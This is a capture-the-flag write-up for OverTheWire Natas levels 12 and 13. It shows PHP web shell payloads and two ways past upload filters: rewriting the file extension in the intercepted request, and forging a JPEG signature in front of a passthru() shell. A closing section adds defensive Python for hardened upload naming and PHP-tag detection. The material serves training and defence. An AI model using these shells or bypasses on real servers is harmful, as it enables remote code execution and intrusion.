Natas 12 & 13 writeup

24 March 2019
by th3-3inst3in


Natas 12

Visit this link to go to level 12 for which you’ll need the password from the previous level.

You'll land on a page where you can upload a file. Our objective here is to upload a PHP file and get code execution.

The problem is that even if you upload a PHP file, it gets renamed to a .jpg file, so we need to intercept the request and change the file extension.

<?php system($_GET['cmd']); ?>

Select the file, intercept the request, and change the extension to php as shown in the picture.

intercept

After the file is uploaded, you'll be given a link looking something like this:

http://natas12.natas.labs.overthewire.org/upload/.php

You now have code execution on the server and can simply get the flag with the following command:

intercept

Natas 13

Level 13 is quite similar to 12, with one minor change.

Even if we use the trick from the last level, we don't get the PHP file to execute on the server. The reason is the following line of code:

else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
    echo "File is not an image";
}

The following Python code can help bypass this check:

>>> # Open in binary mode ('wb') so the leading bytes are written exactly as given
>>> fh = open('shell.php', 'wb')
>>> fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
>>> fh.close()

The code above creates a file that calls passthru() to execute commands on the server, but its first four bytes (FF D8 FF E0) are the signature of a JPEG file. exif_imagetype() only reads the first bytes of a file to check its signature, so the file looks like a valid image and passes the check. Upload the file and voilà, we have our shell.

13 flag
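
Seen from the server's side, both levels fail for the same reason: the stored extension comes from the request. The Python sketch below is an added example, not code from this writeup or from the Natas source; the function names, token lengths and signature table are assumptions. It puts a level-13-style signature check next to one that derives the extension from the file content, plus a heuristic scan for PHP open tags.

```python
import os
import re
import secrets

# File signatures mapped to the only extension the server will assign.
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
# Heuristic for PHP open tags; "<?xpacket" (XMP metadata in real JPEGs) is not matched.
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)


def detect_extension(data):
    """Return the extension implied by the leading bytes, or None."""
    for signature, ext in SIGNATURES.items():
        if data.startswith(signature):
            return ext
    return None


def level13_style_name(client_name, data):
    """Signature check only; the stored extension still comes from the request."""
    if detect_extension(data) is None:
        return None  # "File is not an image"
    return secrets.token_hex(5) + os.path.splitext(client_name)[1]


def hardened_name(client_name, data):
    """Ignore client_name entirely; the extension is derived from the content."""
    ext = detect_extension(data)
    return None if ext is None else secrets.token_hex(8) + ext


def has_embedded_php(data):
    """Flag uploads that carry a PHP open tag anywhere in the body."""
    return PHP_TAG.search(data) is not None


if __name__ == "__main__":
    # Constructed sample: JPEG signature followed by a harmless PHP tag.
    sample = b"\xff\xd8\xff\xe0" + b"<? echo 1; ?>"
    print(level13_style_name("shell.php", sample))
    print(hardened_name("shell.php", sample))
    print(has_embedded_php(sample))
```

The tag scan is only a detection signal and can misfire on binary data; serving uploads from a directory where PHP execution is disabled remains the stronger control.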

tags: web - overthewire